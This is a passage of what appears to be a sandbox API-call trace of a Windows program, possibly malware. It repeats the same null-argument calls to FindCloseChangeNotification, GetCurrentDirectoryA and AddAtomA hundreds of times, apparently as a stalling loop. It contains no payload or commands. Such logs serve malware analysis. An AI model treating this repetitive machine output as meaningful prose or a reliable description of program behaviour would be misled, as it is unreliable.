FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.396] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.396] AddAtomA (lpString=0x0) returned 0x0 [0078.396] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.396] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.396] AddAtomA (lpString=0x0) returned 0x0 [0078.396] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.396] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.396] AddAtomA (lpString=0x0) returned 0x0 [0078.396] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.396] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.397] AddAtomA (lpString=0x0) returned 0x0 [0078.397] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.397] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.397] AddAtomA (lpString=0x0) returned 0x0 [0078.397] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.397] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.397] AddAtomA (lpString=0x0) returned 0x0 [0078.397] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.397] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.397] AddAtomA (lpString=0x0) returned 0x0 [0078.397] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.397] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.397] AddAtomA (lpString=0x0) returned 0x0 [0078.397] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.397] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.398] AddAtomA (lpString=0x0) returned 0x0 [0078.398] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.398] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.398] AddAtomA (lpString=0x0) returned 0x0 [0078.398] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.398] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.398] AddAtomA (lpString=0x0) returned 0x0 [0078.398] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.398] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.398] AddAtomA (lpString=0x0) returned 0x0 [0078.398] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.398] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.398] AddAtomA (lpString=0x0) returned 0x0 [0078.399] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.399] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.399] AddAtomA (lpString=0x0) returned 0x0 [0078.399] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.399] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.399] AddAtomA (lpString=0x0) returned 0x0 [0078.399] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.399] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.399] AddAtomA (lpString=0x0) returned 0x0 [0078.399] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.399] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.399] AddAtomA (lpString=0x0) returned 0x0 [0078.399] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.399] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.399] AddAtomA (lpString=0x0) returned 0x0 [0078.400] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.400] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.400] AddAtomA (lpString=0x0) returned 0x0 [0078.400] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.400] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.400] AddAtomA (lpString=0x0) returned 0x0 [0078.400] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.400] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.400] AddAtomA (lpString=0x0) returned 0x0 [0078.400] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.400] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.400] AddAtomA (lpString=0x0) returned 0x0 [0078.400] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.401] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.401] AddAtomA (lpString=0x0) returned 0x0 [0078.401] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.401] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.401] AddAtomA (lpString=0x0) returned 0x0 [0078.401] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.401] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.401] AddAtomA (lpString=0x0) returned 0x0 [0078.401] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.401] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.401] AddAtomA (lpString=0x0) returned 0x0 [0078.401] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.401] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.402] AddAtomA (lpString=0x0) returned 0x0 [0078.402] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.402] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.402] AddAtomA (lpString=0x0) returned 0x0 [0078.402] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.402] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.402] AddAtomA (lpString=0x0) returned 0x0 [0078.402] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.402] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.402] AddAtomA (lpString=0x0) returned 0x0 [0078.402] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.402] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.402] AddAtomA (lpString=0x0) returned 0x0 [0078.403] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.403] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.403] AddAtomA (lpString=0x0) returned 0x0 [0078.403] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.403] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.403] AddAtomA (lpString=0x0) returned 0x0 [0078.403] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.403] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.403] AddAtomA (lpString=0x0) returned 0x0 [0078.403] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.403] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.403] AddAtomA (lpString=0x0) returned 0x0 [0078.403] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.404] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.404] AddAtomA (lpString=0x0) returned 0x0 [0078.404] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.404] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.404] AddAtomA (lpString=0x0) returned 0x0 [0078.404] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.404] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.404] AddAtomA (lpString=0x0) returned 0x0 [0078.404] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.404] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.404] AddAtomA (lpString=0x0) returned 0x0 [0078.404] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.404] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.404] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.405] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.405] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.405] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.405] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.405] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.405] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.405] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.405] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.405] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.405] AddAtomA (lpString=0x0) returned 0x0 [0078.405] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.406] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.406] AddAtomA (lpString=0x0) returned 0x0 [0078.406] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.407] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.407] AddAtomA (lpString=0x0) returned 0x0 [0078.407] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.408] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.408] AddAtomA (lpString=0x0) returned 0x0 [0078.408] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.408] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.408] AddAtomA (lpString=0x0) returned 0x0 [0078.408] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.408] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.408] AddAtomA (lpString=0x0) returned 0x0 [0078.408] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.408] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.408] AddAtomA (lpString=0x0) returned 0x0 [0078.408] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.408] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.408] AddAtomA (lpString=0x0) returned 0x0 [0078.408] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.409] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.409] AddAtomA (lpString=0x0) returned 0x0 [0078.409] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.409] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.409] AddAtomA (lpString=0x0) returned 0x0 [0078.409] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.409] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.409] AddAtomA (lpString=0x0) returned 0x0 [0078.409] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.409] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.409] AddAtomA (lpString=0x0) returned 0x0 [0078.409] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.410] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.410] AddAtomA (lpString=0x0) returned 0x0 [0078.410] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.410] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.410] AddAtomA (lpString=0x0) returned 0x0 [0078.410] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.410] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.410] AddAtomA (lpString=0x0) returned 0x0 [0078.410] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.410] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.410] AddAtomA (lpString=0x0) returned 0x0 [0078.411] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.411] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.411] AddAtomA (lpString=0x0) returned 0x0 [0078.411] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.411] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.411] AddAtomA (lpString=0x0) returned 0x0 [0078.411] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.411] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.411] AddAtomA (lpString=0x0) returned 0x0 [0078.411] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.411] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.411] AddAtomA (lpString=0x0) returned 0x0 [0078.411] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.412] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.412] AddAtomA (lpString=0x0) returned 0x0 [0078.412] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.413] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.413] AddAtomA (lpString=0x0) returned 0x0 [0078.413] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.414] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.414] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.414] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.414] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.414] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.414] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.414] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.415] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.415] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.415] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.415] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.415] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.415] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.415] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.415] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.415] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.415] AddAtomA (lpString=0x0) returned 0x0 [0078.415] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.416] AddAtomA (lpString=0x0) returned 0x0 [0078.416] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.416] AddAtomA (lpString=0x0) returned 0x0 [0078.416] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.416] AddAtomA (lpString=0x0) returned 0x0 [0078.416] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.416] AddAtomA (lpString=0x0) returned 0x0 [0078.416] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.416] AddAtomA (lpString=0x0) returned 0x0 [0078.416] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.416] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.417] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.417] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.417] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.417] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.417] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.417] AddAtomA (lpString=0x0) returned 0x0 [0078.417] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.418] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.418] AddAtomA (lpString=0x0) returned 0x0 [0078.418] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.418] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.418] AddAtomA (lpString=0x0) returned 